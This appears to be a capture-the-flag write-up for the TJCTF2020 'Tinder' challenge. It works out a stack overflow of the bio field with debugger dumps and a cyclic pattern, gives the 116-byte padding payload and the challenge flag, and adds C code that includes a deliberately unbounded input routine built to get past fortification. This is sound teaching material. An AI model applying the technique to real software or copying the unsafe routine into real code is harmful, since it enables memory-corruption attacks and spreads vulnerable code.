Tags: exploitation
# Tinder | TJCTF2020
## Problem
Written by agcdragon
Start swiping! <--- binary included in link
## Solution
### 1. Run the binary and see what happens
```bash
kali@kali:~/Desktop/tjctf2020/tinder$ file match
match: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=20dc2329afce6884ca6bdae371f7af93bee637d5, with debug_info, not stripped
Welcome to TJTinder, please register to start matching!
Name: Jack
Username: jib1337
Password: password
Tinder Bio: hello
Registered 'jib1337' to TJTinder successfully!
Searching for matches...
Sorry, no matches found. Try Again!
```
Not much to go on.
### 2. Check it out in Radare2
In Radare2, we notice this amongst the code in main: a stack variable is compared against a constant, and the flag-printing code is only reached when the two match.
```bash
│ 0x080488cf e84cfeffff call sym.input
│ 0x080488d4 83c410 add esp, 0x10
│ 0x080488d7 83ec0c sub esp, 0xc ; .//match.c:56
│ 0x080488da 6a0a push 0xa ; 10 ; int c
│ 0x080488dc e89ffcffff call sym.imp.putchar ; int putchar(int c)
│ 0x080488e1 83c410 add esp, 0x10
│ 0x080488e4 817df40dd0d3. cmp dword [var_ch], 0xc0d3d00d ; .//match.c:58
│ ┌─< 0x080488eb 0f85b7000000 jne 0x80489a8
```
This is where it branches towards the flag function, so we need to overwrite this variable with the value 0xc0d3d00d.
Let's debug and find out what the state of everything is when it does the comparison.
```bash
kali@kali:~/Desktop/tjctf2020/tinder$ r2 -d match
Process with PID 2750 started...
= attach 2750 2750
bin.baddr 0x08048000
Using 0x8048000
asm.bits 32
glibc.fc_offset = 0x00148
Warning: r_bin_file_hash: file exceeds bin.hashlimit
[0xf7f770b0]> aaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for objc references
[x] Check for vtables
[TOFIX: aaft can't run in debugger mode.ions (aaft)
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
[0x080487ed]> db 0x080488e4
[0x080487ed]> dc
Welcome to TJTinder, please register to start matching!
Name: Jack
Username: jib1337
Password: password
Tinder Bio: hello
hit breakpoint at: 80488e4
[0x080488e4]> afvd
var var_ch = 0xffae2c5c = 0 <----------- This is what we need to change
var var_20h = 0xffae2c48 = 1801675082
var var_30h = 0xffae2c38 = 828533098
var var_40h = 0xffae2c28 = 1936941424
var var_80h = 0xffae2be8 = 1819043176
var var_8h = 0xffae2c60 = 4289604736
var var_10h = 0xffae2c58 = 4289604892
var var_a0h = 0xffae2bc8 = 134513276
arg arg_4h = 0xffae2bc4 = 4160227445
```
We can print the stack and see where we need to go.
```bash
[0x080488e4]> pxw @ esp
0xffae2bc0 0x0804837b 0xf7f80875 0x0804827c 0xffae2c3c {...u...|...<,..
0xffae2bd0 0xf7f9faa0 0x00000001 0xf7f6e410 0x00000001 ................
0xffae2be0 0x00000000 0x00000001 0x6c6c6568 0x0000006f ........hello...
0xffae2bf0 0x00000000 0x00c30000 0x00000001 0xf7f9e800 ................
0xffae2c00 0xffae2c50 0x00000000 0xf7f9f000 0x00000000 P,..............
0xffae2c10 0x00000000 0xffae2d14 0xf7f53000 0xf7f51a80 .....-...0......
0xffae2c20 0x00000000 0xf7f53000 0x73736170 0x64726f77 .....0..password
0xffae2c30 0xf7f50000 0xf7f86140 0x3162696a 0x00373333 [email protected].
0xffae2c40 0xf7f53300 0x00040000 0x6b63614a 0x08040000 .3......Jack....
0xffae2c50 0x00000001 0xffae2d14 0xffae2d1c 0x00000000 .....-...-...... <----------- This line here.
0xffae2c60 0xffae2c80 0x00000000 0x00000000 0xf7d91ef1 .,..............
0xffae2c70 0xf7f53000 0xf7f53000 0x00000000 0xf7d91ef1 .0...0..........
0xffae2c80 0x00000001 0xffae2d14 0xffae2d1c 0xffae2ca4 .....-...-...,..
0xffae2c90 0x00000001 0x00000000 0xf7f53000 0x00000000 .........0......
0xffae2ca0 0xf7f9f000 0x00000000 0xf7f53000 0xf7f53000 .........0...0..
0xffae2cb0 0x00000000 0xa6be3b64 0x48da5d74 0x00000000 ....d;..t].H....
```
We can do some stack telescoping to get an even better view.
```bash
[0x080488e4]> pxr @ esp
...
0xffae2c38 0x3162696a jib1 ascii ('j')
0xffae2c3c 0x00373333 337. ascii ('3')
0xffae2c40 0xf7f53300 .3..
0xffae2c44 0x00040000 ....
0xffae2c48 0x6b63614a Jack ascii ('J')
0xffae2c4c 0x08040000 ....
0xffae2c50 0x00000001 .... 1 (.comment)
0xffae2c54 0xffae2d14 .-.. ([stack]) stack R W 0xffae3508 --> ([stack]) stack R W 0x616d2f2e (./match) --> ascii ('.')
0xffae2c58 0xffae2d1c .-.. ([stack]) stack R W 0xffae3510 --> ([stack]) stack R W 0x4c454853 (SHELL=/bin/bash) --> ascii ('S')
0xffae2c5c ..[ null bytes ].. 00000000 <--------- RIGHT HERE!!!
0xffae2c60 0xffae2c80 .,.. ([stack]) stack R W 0x1 --> 1 (.comment)
0xffae2c64 ..[ null bytes ].. 00000000
0xffae2c6c 0xf7d91ef1 ....
0xffae2c70 0xf7f53000 .0..
0xffae2c74 0xf7f53000 .0..
0xffae2c78 ..[ null bytes ].. 00000000
0xffae2c7c 0xf7d91ef1 ....
0xffae2c80 0x00000001 .... 1 (.comment)
0xffae2c84 0xffae2d14 .-.. ([stack]) stack R W 0xffae3508 --> ([stack]) stack R W 0x616d2f2e (./match) --> ascii ('.')
0xffae2c88 0xffae2d1c .-.. ([stack]) stack R W 0xffae3510 --> ([stack]) stack R W 0x4c454853 (SHELL=/bin/bash) --> ascii ('S')
0xffae2c8c 0xffae2ca4 .,.. ([stack]) stack R W 0x0 --> 0 obj.imp.stdout
0xffae2c90 0x00000001 .... 1 (.comment)
0xffae2c94 ..[ null bytes ].. 00000000
0xffae2c98 0xf7f53000 .0..
0xffae2c9c ..[ null bytes ].. 00000000
0xffae2ca0 0xf7f9f000 .... (/usr/lib32/ld-2.30.so) library R W 0x28f24
0xffae2ca4 ..[ null bytes ].. 00000000
0xffae2ca8 0xf7f53000 .0..
0xffae2cac 0xf7f53000 .0..
0xffae2cb0 ..[ null bytes ].. 00000000
0xffae2cb4 0xa6be3b64 d;..
0xffae2cb8 0x48da5d74 t].H 0 obj.imp.stdout
0xffae2cbc ..[ null bytes ].. 00000000
```
We now know the value we need to overwrite. Time to try some stuff. It looks like we are roughly 20 bytes away from the address we need to overwrite. So I'll supply 20 input bytes and see where that gets us.
```bash
[0xf7fd10b0]> dc
Welcome to TJTinder, please register to start matching!
Name: aaaabbbbccccddddeeee
Username: jib1337
Password: password
Tinder Bio: hello
hit breakpoint at: 80488e4
[0x080488e4]> pxr @ esp
...
0xfff5f46c 0xf7faba80 ....
0xfff5f470 ..[ null bytes ].. 00000000
0xfff5f474 0xf7fad000 ....
0xfff5f478 0x73736170 pass ascii ('p')
0xfff5f47c 0x64726f77 word ascii ('w')
0xfff5f480 0xf7fa0000 ....
0xfff5f484 0xf7fe0140 @... (/usr/lib32/ld-2.30.so) library R X 'push ebp' 'ld-2.30.so'
0xfff5f488 0x3162696a jib1 ascii ('j')
0xfff5f48c 0x00373333 337. ascii ('3')
0xfff5f490 0xf7fad300 ....
0xfff5f494 0x00040000 ....
0xfff5f498 0x61616161 aaaa ascii ('a')
0xfff5f49c 0x62626262 bbbb ascii ('b')
0xfff5f4a0 0x63636363 cccc ascii ('c')
0xfff5f4a4 0x00646464 ddd. ascii ('d')
0xfff5f4a8 0xfff5f56c l... ([stack]) stack R W 0xfff61510 --> ([stack]) stack R W 0x4c454853 (SHELL=/bin/bash) --> ascii ('S')
0xfff5f4ac ..[ null bytes ].. 00000000
0xfff5f4b0 0xfff5f4d0 .... ([stack]) stack R W 0x1 --> 1 (.comment)
0xfff5f4b4 ..[ null bytes ].. 00000000
0xfff5f4bc 0xf7debef1 ....
...
```
Right, so we can't actually write past 15 bytes of input, not including the null byte. Looking back at the code, that makes sense. There is actually an input function which is used to receive input from the user, and the maximum input size is whatever is in eax (the size argument passed to fgets) at each call.
```bash
[0x080487ed]> pdf @sym.input
; CALL XREFS from main @ 0x804884d, 0x8048877, 0x80488a1, 0x80488cf
┌ 205: sym.input (int32_t arg_8h);
│ ; var int32_t var_10h @ ebp-0x10
│ ; var int32_t var_ch @ ebp-0xc
│ ; var int32_t var_ah @ ebp-0xa
│ ; var int32_t var_4h @ ebp-0x4
│ ; arg int32_t arg_8h @ ebp+0x8
│ 0x08048720 55 push ebp ; .//match.c:19
│ 0x08048721 89e5 mov ebp, esp
│ 0x08048723 53 push ebx
│ 0x08048724 83ec14 sub esp, 0x14
│ 0x08048727 e8e4feffff call sym.__x86.get_pc_thunk.bx
│ 0x0804872c 81c3d4180000 add ebx, 0x18d4
│ 0x08048732 8b83f8ffffff mov eax, dword [ebx - 8] ; .//match.c:20
│ 0x08048738 8b10 mov edx, dword [eax]
│ 0x0804873a d9450c fld dword [ebp + 0xc]
│ 0x0804873d d983e8ebffff fld dword [ebx - 0x1418]
│ 0x08048743 dec9 fmulp st(1)
│ 0x08048745 d97df6 fnstcw word [var_ah]
│ 0x08048748 0fb745f6 movzx eax, word [var_ah]
│ 0x0804874c 80cc0c or ah, 0xc ; 12
│ 0x0804874f 668945f4 mov word [var_ch], ax
│ 0x08048753 d96df4 fldcw word [var_ch]
│ 0x08048756 db5df0 fistp dword [var_10h]
│ 0x08048759 d96df6 fldcw word [var_ah]
│ 0x0804875c 8b45f0 mov eax, dword [var_10h]
│ 0x0804875f 83ec04 sub esp, 4
│ 0x08048762 52 push edx ; FILE *stream
│ 0x08048763 50 push eax ; int size
│ 0x08048764 ff7508 push dword [arg_8h] ; char *s
│ 0x08048767 e884fdffff call sym.imp.fgets ; char *fgets(char *s, int size, FILE *stream)
│ 0x0804876c 83c410 add esp, 0x10
│ 0x0804876f 83ec0c sub esp, 0xc ; .//match.c:22
│ 0x08048772 ff7508 push dword [arg_8h] ; const char *s
│ 0x08048775 e8d6fdffff call sym.imp.strlen ; size_t strlen(const char *s)
│ 0x0804877a 83c410 add esp, 0x10
│ 0x0804877d 83f801 cmp eax, 1 ; 1
│ ┌─< 0x08048780 771c ja 0x804879e
│ │ 0x08048782 83ec0c sub esp, 0xc ; .//match.c:23
│ │ 0x08048785 8d8380eaffff lea eax, dword [ebx - 0x1580]
│ │ 0x0804878b 50 push eax ; const char *s
│ │ 0x0804878c e88ffdffff call sym.imp.puts ; int puts(const char *s)
│ │ 0x08048791 83c410 add esp, 0x10
│ │ 0x08048794 83ec0c sub esp, 0xc ; .//match.c:24
│ │ 0x08048797 6a00 push 0 ; int status
│ │ 0x08048799 e892fdffff call sym.imp.exit ; void exit(int status)
│ │ ; CODE XREF from sym.input @ 0x8048780
│ └─> 0x0804879e 83ec08 sub esp, 8 ; .//match.c:25
│ 0x080487a1 6a0a push 0xa ; 10 ; int c
│ 0x080487a3 ff7508 push dword [arg_8h] ; const char *s
│ 0x080487a6 e895fdffff call sym.imp.strchr ; char *strchr(const char *s, int c)
│ 0x080487ab 83c410 add esp, 0x10
│ 0x080487ae 85c0 test eax, eax
│ ┌─< 0x080487b0 751c jne 0x80487ce
│ │ 0x080487b2 90 nop ; .//match.c:26
│ │ ; CODE XREF from sym.input @ 0x80487ca
│ ┌──> 0x080487b3 8b83f8ffffff mov eax, dword [ebx - 8]
│ ╎│ 0x080487b9 8b00 mov eax, dword [eax]
│ ╎│ 0x080487bb 83ec0c sub esp, 0xc
│ ╎│ 0x080487be 50 push eax ; FILE *stream
│ ╎│ 0x080487bf e8ccfdffff call sym.imp.fgetc ; int fgetc(FILE *stream)
│ ╎│ 0x080487c4 83c410 add esp, 0x10
│ ╎│ 0x080487c7 83f80a cmp eax, 0xa ; 10
│ └──< 0x080487ca 75e7 jne 0x80487b3
│ ┌──< 0x080487cc eb19 jmp 0x80487e7
│ ││ ; CODE XREF from sym.input @ 0x80487b0
│ │└─> 0x080487ce 83ec0c sub esp, 0xc ; .//match.c:28
│ │ 0x080487d1 ff7508 push dword [arg_8h] ; const char *s
│ │ 0x080487d4 e877fdffff call sym.imp.strlen ; size_t strlen(const char *s)
│ │ 0x080487d9 83c410 add esp, 0x10
│ │ 0x080487dc 8d50ff lea edx, dword [eax - 1]
│ │ 0x080487df 8b4508 mov eax, dword [arg_8h]
│ │ 0x080487e2 01d0 add eax, edx
│ │ 0x080487e4 c60000 mov byte [eax], 0
│ │ ; CODE XREF from sym.input @ 0x80487cc
│ └──> 0x080487e7 90 nop ; .//match.c:30
│ 0x080487e8 8b5dfc mov ebx, dword [var_4h]
│ 0x080487eb c9 leave
└ 0x080487ec c3 ret
```
I put a breakpoint just before the fgets call and start the program.
```bash
[0xf7f420b0]> db 0x08048767
[0xf7f420b0]> dc
Welcome to TJTinder, please register to start matching!
Name: hit breakpoint at: 8048767
[0x08048767]> dr
eax = 0x00000010 <---------- this is equal to 16
ebx = 0x0804a000
ecx = 0xffffffff
edx = 0xf7f1e580
esi = 0xf7f1e000
edi = 0xf7f1e000
esp = 0xffa2f830
ebp = 0xffa2f858
eip = 0x08048767
eflags = 0x00000296
oeax = 0xffffffff
```
Without printing them all, the maximum sizes for these inputs are all 16, except for the bio, which is 128. Let's test a theory here by providing 128 bytes of input to the bio.
```bash
[0xf7efe0b0]> db 0x080488e4
[0xf7efe0b0]> dc
Welcome to TJTinder, please register to start matching!
Name: Jack
Username: jib1337
Password: password
Tinder Bio: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
hit breakpoint at: 80488e4
[0x080488e4]> pxr @ esp
0xffeb9080 0x0804837b {... @esp (/home/kali/Desktop/tjctf2020/tinder/match) (.dynstr) program R X 'pop edi' 'match' (__libc_start_main)
0xffeb9084 0xf7f07875 ux.. (/usr/lib32/ld-2.30.so) library R X 'add esp, 0x30' 'ld-2.30.so'
0xffeb9088 0x0804827c |... (/home/kali/Desktop/tjctf2020/tinder/match) (.dynsym) program R X 'jg 0x804827e' 'match'
0xffeb908c 0xffeb90fc .... ([stack]) stack R W 0x61616161 (aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa) --> ascii ('a')
0xffeb9090 0xf7f26aa0 .j.. (/usr/lib32/ld-2.30.so) library R W 0xf7ef53e0
0xffeb9094 0x00000001 .... 1 (.comment)
0xffeb9098 0xf7ef5410 .T..
0xffeb909c 0x00000001 .... 1 (.comment)
0xffeb90a0 ..[ null bytes ].. 00000000
0xffeb90a4 0x00000001 .... 1 (.comment)
0xffeb90a8 0x61616161 aaaa ascii ('a')
0xffeb90ac 0x61616161 aaaa ascii ('a')
0xffeb90b0 0x61616161 aaaa ascii ('a')
0xffeb90b4 0x61616161 aaaa ascii ('a')
0xffeb90b8 0x61616161 aaaa ascii ('a')
0xffeb90bc 0x61616161 aaaa ascii ('a')
0xffeb90c0 0x61616161 aaaa ascii ('a')
0xffeb90c4 0x61616161 aaaa ascii ('a')
0xffeb90c8 0x61616161 aaaa ascii ('a')
0xffeb90cc 0x61616161 aaaa ascii ('a')
0xffeb90d0 0x61616161 aaaa ascii ('a')
0xffeb90d4 0x61616161 aaaa ascii ('a')
0xffeb90d8 0x61616161 aaaa ascii ('a')
0xffeb90dc 0x61616161 aaaa ascii ('a')
0xffeb90e0 0x61616161 aaaa ascii ('a')
0xffeb90e4 0x61616161 aaaa ascii ('a')
0xffeb90e8 0x61616161 aaaa ascii ('a')
0xffeb90ec 0x61616161 aaaa ascii ('a')
0xffeb90f0 0x61616161 aaaa ascii ('a')
0xffeb90f4 0x61616161 aaaa ascii ('a')
0xffeb90f8 0x61616161 aaaa ascii ('a')
0xffeb90fc 0x61616161 aaaa ascii ('a')
0xffeb9100 0x61616161 aaaa ascii ('a')
0xffeb9104 0x61616161 aaaa ascii ('a')
0xffeb9108 0x61616161 aaaa ascii ('a')
0xffeb910c 0x61616161 aaaa ascii ('a')
0xffeb9110 0x61616161 aaaa ascii ('a')
0xffeb9114 0x61616161 aaaa ascii ('a')
0xffeb9118 0x61616161 aaaa ascii ('a')
0xffeb911c 0x61616161 aaaa ascii ('a')
0xffeb9120 0x61616161 aaaa ascii ('a')
0xffeb9124 0x00616161 aaa. ascii ('a')
0xffeb9128 ..[ null bytes ].. 00000000 ebp
0xffeb912c 0xf7d18ef1 ....
0xffeb9130 0xf7eda000 ....
...
[0x080488e4]> afvd
var var_ch = 0xffeb911c = 1633771873
var var_20h = 0xffeb9108 = 1633771873
var var_30h = 0xffeb90f8 = 1633771873
var var_40h = 0xffeb90e8 = 1633771873
var var_80h = 0xffeb90a8 = 1633771873
var var_8h = 0xffeb9120 = 1633771873
var var_10h = 0xffeb9118 = 1633771873
var var_a0h = 0xffeb9088 = 134513276
arg arg_4h = 0xffeb9084 = 4159731829
[0x080488e4]> dc
Registered 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' to TJTinder successfully!
Searching for matches...
Sorry, no matches found. Try Again!
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x6161615d code=1 ret=0
```
This is a good sign. The value we need to overwrite is now being overwritten through the bio input. Now I just have to work out the exact offset so we can win. We'll use a cyclic pattern to see how much input we need exactly.
```bash
kali@kali:~/Desktop$ python -c "from pwn import cyclic; print cyclic(128)"
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaab
[0xf7f460b0]> db 0x080488e4
[0xf7f460b0]> dc
Welcome to TJTinder, please register to start matching!
Name: Jack
Username: jib1337
Password: password
Tinder Bio: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaab
hit breakpoint at: 80488e4
[0x080488e4]> afvd
var var_ch = 0xffc6320c = 1650549093
var var_20h = 0xffc631f8 = 1633771897
var var_30h = 0xffc631e8 = 1633771893
var var_40h = 0xffc631d8 = 1633771889
var var_80h = 0xffc63198 = 1633771873
var var_8h = 0xffc63210 = 1650549094
var var_10h = 0xffc63208 = 1650549092
var var_a0h = 0xffc63178 = 134513276
arg arg_4h = 0xffc63174 = 4160026741
[0x080488e4]> pxr @ esp
0xffc63170 0x0804837b {... @esp (/home/kali/Desktop/tjctf2020/tinder/match) (.dynstr) program R X 'pop edi' 'match' (__libc_start_main)
0xffc63174 0xf7f4f875 u... (/usr/lib32/ld-2.30.so) library R X 'add esp, 0x30' 'ld-2.30.so'
0xffc63178 0x0804827c |... (/home/kali/Desktop/tjctf2020/tinder/match) (.dynsym) program R X 'jg 0x804827e' 'match'
0xffc6317c 0xffc631ec .1.. ([stack]) stack R W 0x61616176 (vaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaa) --> ascii ('v')
0xffc63180 0xf7f6eaa0 .... (/usr/lib32/ld-2.30.so) library R W 0xf7f3d3e0
0xffc63184 0x00000001 .... 1 (.comment)
0xffc63188 0xf7f3d410 ....
0xffc6318c 0x00000001 .... 1 (.comment)
0xffc63190 ..[ null bytes ].. 00000000
0xffc63194 0x00000001 .... 1 (.comment)
0xffc63198 0x61616161 aaaa ascii ('a')
0xffc6319c 0x61616162 baaa ascii ('b')
0xffc631a0 0x61616163 caaa ascii ('c')
0xffc631a4 0x61616164 daaa ascii ('d')
0xffc631a8 0x61616165 eaaa ascii ('e')
0xffc631ac 0x61616166 faaa ascii ('f')
0xffc631b0 0x61616167 gaaa ascii ('g')
0xffc631b4 0x61616168 haaa ascii ('h')
0xffc631b8 0x61616169 iaaa ascii ('i')
0xffc631bc 0x6161616a jaaa ascii ('j')
0xffc631c0 0x6161616b kaaa ascii ('k')
0xffc631c4 0x6161616c laaa ascii ('l')
0xffc631c8 0x6161616d maaa ascii ('m')
0xffc631cc 0x6161616e naaa ascii ('n')
0xffc631d0 0x6161616f oaaa ascii ('o')
0xffc631d4 0x61616170 paaa ascii ('p')
0xffc631d8 0x61616171 qaaa ascii ('q')
0xffc631dc 0x61616172 raaa ascii ('r')
0xffc631e0 0x61616173 saaa ascii ('s')
0xffc631e4 0x61616174 taaa ascii ('t')
0xffc631e8 0x61616175 uaaa ascii ('u')
0xffc631ec 0x61616176 vaaa ascii ('v')
0xffc631f0 0x61616177 waaa ascii ('w')
0xffc631f4 0x61616178 xaaa ascii ('x')
0xffc631f8 0x61616179 yaaa ascii ('y')
0xffc631fc 0x6261617a zaab ascii ('z')
0xffc63200 0x62616162 baab ascii ('b')
0xffc63204 0x62616163 caab ascii ('c')
0xffc63208 0x62616164 daab ascii ('d')
0xffc6320c 0x62616165 eaab ascii ('e') <---------- RIGHT HERE!!!
0xffc63210 0x62616166 faab ascii ('f')
0xffc63214 0x00616167 gaa. ascii ('g')
kali@kali:~/Desktop$ python -c "from pwn import cyclic_find; print(cyclic_find(0x62616165))"
116
```
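For anyone who wants to see what `cyclic` and `cyclic_find` do under the hood, here is the same thing written out in C. This is an added example, not part of the original write-up and not pwntools code: pwntools builds its pattern as a de Bruijn sequence over `a`..`z` with a window length of 4 using the standard recursive construction, which is what `db()` below reproduces. The names `cyclic`, `cyclic_find` and `cyclic_matches` are mine (the first two mirror the pwntools names); `MAX_PATTERN` is an arbitrary cap I chose.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not part of the write-up: what pwntools' cyclic() and
 * cyclic_find() do, written out in C.  cyclic() is a de Bruijn sequence over
 * 'a'..'z' with window length 4, built by the standard recursive (FKM)
 * construction pwntools uses; every 4-byte window occurs at most once, so the
 * window that lands in a variable pins down its offset. */
#define ALPHABET "abcdefghijklmnopqrstuvwxyz"
#define K 26                 /* alphabet size */
#define N 4                  /* window length: one 32-bit register or slot */
#define MAX_PATTERN 4096     /* arbitrary cap for the static buffers below */

struct gen { char *out; size_t cap, len; int a[K * N + 1]; };

static void db(struct gen *g, int t, int p)
{
    if (g->len >= g->cap)                   /* enough bytes produced */
        return;
    if (t > N) {
        if (N % p == 0)
            for (int j = 1; j <= p && g->len < g->cap; j++)
                g->out[g->len++] = ALPHABET[g->a[j]];
        return;
    }
    g->a[t] = g->a[t - p];
    db(g, t + 1, p);
    for (int j = g->a[t - p] + 1; j < K; j++) {
        g->a[t] = j;
        db(g, t + 1, t);
    }
}

/* First n bytes of the pattern into out (NUL-terminated; out holds n+1). */
void cyclic(char *out, size_t n)
{
    struct gen g = { out, n, 0, {0} };
    db(&g, 1, 1);
    out[n] = '\0';
}

/* Offset of the first window whose little-endian 32-bit value is `value`
 * (the way a dword read off the stack shows up), or -1 if absent. */
long cyclic_find(uint32_t value, size_t pattern_len)
{
    static char pat[MAX_PATTERN + 1];
    char needle[N];
    if (pattern_len > MAX_PATTERN)
        pattern_len = MAX_PATTERN;
    cyclic(pat, pattern_len);
    for (int i = 0; i < N; i++)
        needle[i] = (char)((value >> (8 * i)) & 0xffu);
    for (size_t i = 0; i + N <= pattern_len; i++)
        if (memcmp(pat + i, needle, N) == 0)
            return (long)i;
    return -1;
}

/* 1 if the first n pattern bytes equal `expected`, else 0. */
int cyclic_matches(const char *expected, size_t n)
{
    static char pat[MAX_PATTERN + 1];
    if (n > MAX_PATTERN)
        return 0;
    cyclic(pat, n);
    return strncmp(pat, expected, n) == 0;
}

int main(void)
{
    char pat[129];
    cyclic(pat, 128);
    printf("%s\n", pat);
    /* var_ch held 0x62616165 ("eaab"); the pattern offset should agree with
     * the frame distance from ebp-0x80 to ebp-0xc, 0x74 = 116. */
    printf("offset of 0x62616165: %ld\n", cyclic_find(0x62616165u, 128));
    return 0;
}
```

The 116 has a second, independent confirmation in the `afvd` output above: the bio buffer `var_80h` sits at `ebp-0x80` and the compared variable `var_ch` at `ebp-0xc`, and `0x80 - 0xc = 0x74 = 116`. When a pattern offset and the frame layout agree like this, you can be confident the overwrite is a plain linear overflow and not something stranger.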
### 3. Get the flag
Our payload is 116 bytes of padding followed by 0xc0d3d00d in little-endian byte order. We can try it offline first (see solve.py).
```bash
kali@kali:~/Desktop/tjctf2020/tinder$ python solve.py
[+] Starting local process './match': pid 3702
Welcome to TJTinder, please register to start matching!
Name:
Username:
Password:
Tinder Bio:
[*] Process './match' stopped with exit code 0 (pid 3702)
Registered 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���' to TJTinder successfully!
Searching for matches...
It's a match!
Flag File is Missing. Contact a moderator if running on server.
```
Cool, looks like it works. Then we just run it on the server to win!
```bash
kali@kali:~/Desktop/tjctf2020/tinder$ python solve.py REMOTE
[+] Starting local process './match': pid 3702
Welcome to TJTinder, please register to start matching!
Name:
Username:
Password:
Tinder Bio:
[*] Process './match' stopped with exit code 0 (pid 3702)
Registered 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���' to TJTinder successfully!
Searching for matches...
It's a match!
Here is your flag: tjctf{0v3rfl0w_0f_m4tch35}
```
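To close out with the root cause: the added example below (my own code, not the challenge's match.c, which is not on this page) reconstructs the `input` routine from the disassembly in section 2 and puts it next to a bounded version. A frame-shaped struct mirrors the `afvd` offsets, with the bio buffer 116 bytes below the compared variable, and the limit of 128 is the bio limit found in the register dumps. The names `input_as_compiled`, `input_bounded`, `struct frame`, `mem_input`, `match_of` and `match_after_*` are mine, and the reconstruction takes the fgets limit as a plain int rather than deriving it from the float argument the binary uses.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the challenge's match.c.  input_as_compiled() follows the
 * binary's input() as read from the listing above: fgets() with a caller-chosen
 * limit, exit on an empty line, swallow the rest of an overlong line, strip the
 * newline.  The binary derives the limit from a float argument (fld/fmulp/
 * fistp); here it is the int that reaches fgets() in eax.  Returns -1 where
 * the binary calls exit(0). */
static int input_as_compiled(char *s, int limit, FILE *in)
{
    if (fgets(s, limit, in) == NULL)    /* return value unchecked in the binary */
        s[0] = '\0';
    if (strlen(s) <= 1)                 /* match.c:22-24: puts() then exit(0) */
        return -1;
    if (strchr(s, '\n') == NULL) {
        /* match.c:26.  Two defects: nothing ties `limit` to the size of s, and
         * the loop has no EOF test (cmp eax, 0xa; jne), so a closed stdin
         * spins forever. */
        while (fgetc(in) != '\n')
            ;
    } else {
        s[strlen(s) - 1] = '\0';        /* match.c:28 */
    }
    return (int)strlen(s);
}

/* Bounded version: the limit is the destination size, so fgets() cannot write
 * past s, and the drain loop also stops at EOF.  Returns -1 on an empty line,
 * otherwise the number of bytes kept (bufsz-1 means the line was truncated). */
static int input_bounded(char *s, size_t bufsz, FILE *in)
{
    if (bufsz < 2 || fgets(s, (int)bufsz, in) == NULL || strlen(s) <= 1)
        return -1;
    char *nl = strchr(s, '\n');
    if (nl != NULL) {
        *nl = '\0';
        return (int)(nl - s);
    }
    for (int c = fgetc(in); c != '\n' && c != EOF; c = fgetc(in))
        ;
    return (int)strlen(s);
}

/* Stand-in for main's frame: afvd puts the bio buffer at ebp-0x80 and the
 * compared variable var_ch at ebp-0xc, 0x74 = 116 bytes apart (the locals in
 * between are folded into the 116).  The tail pads the object to 128 bytes so
 * the binary's 128-byte fgets() stays inside it. */
struct frame { char bio[116]; unsigned int match; char above[8]; };

/* Constructed input: n copies of `fill` followed by a newline, as a FILE*. */
static FILE *mem_input(int n, char fill)
{
    FILE *f = tmpfile();
    if (f == NULL)
        return NULL;
    for (int i = 0; i < n; i++)
        fputc(fill, f);
    fputc('\n', f);
    rewind(f);
    return f;
}

/* Read `match` via the object's base: byte access stays well-defined after bio
 * was overrun inside the same object. */
static unsigned int match_of(const struct frame *f)
{
    unsigned int v;
    memcpy(&v, (const char *)f + offsetof(struct frame, match), sizeof v);
    return v;
}

/* A bio of n `fill` bytes through each reader; both return what `match` holds
 * afterwards.  The pointer passes through a volatile so a fortified fgets()
 * (_FORTIFY_SOURCE=2 catches exactly this) cannot see the real size and abort
 * before the overrun is observed. */
unsigned int match_after_unchecked(int n, char fill)
{
    struct frame fr = {{0}};
    char *volatile bio = fr.bio;
    FILE *in = mem_input(n, fill);
    if (in == NULL)
        return 0;
    input_as_compiled(bio, 128, in);           /* 128: the binary's bio limit */
    fclose(in);
    return match_of(&fr);
}

unsigned int match_after_bounded(int n, char fill)
{
    struct frame fr = {{0}};
    FILE *in = mem_input(n, fill);
    if (in == NULL)
        return 0;
    input_bounded(fr.bio, sizeof fr.bio, in);  /* limit == sizeof bio */
    fclose(in);
    return match_of(&fr);
}
```

With 127 bytes of `A`, `match_after_unchecked` comes back as 0x41414141: the overlong bio has run straight through the compared variable, just as the `afvd` output showed every local reading 1633771873 (0x61616161). `match_after_bounded` leaves it at 0, because the only limit `fgets` ever sees is `sizeof` the destination. The fix is nothing more than passing the buffer's real size, and a build with `_FORTIFY_SOURCE=2` would have aborted on the oversized `fgets` rather than letting the overwrite land, which is why the example has to hide the buffer size behind a volatile pointer to show the bug at all.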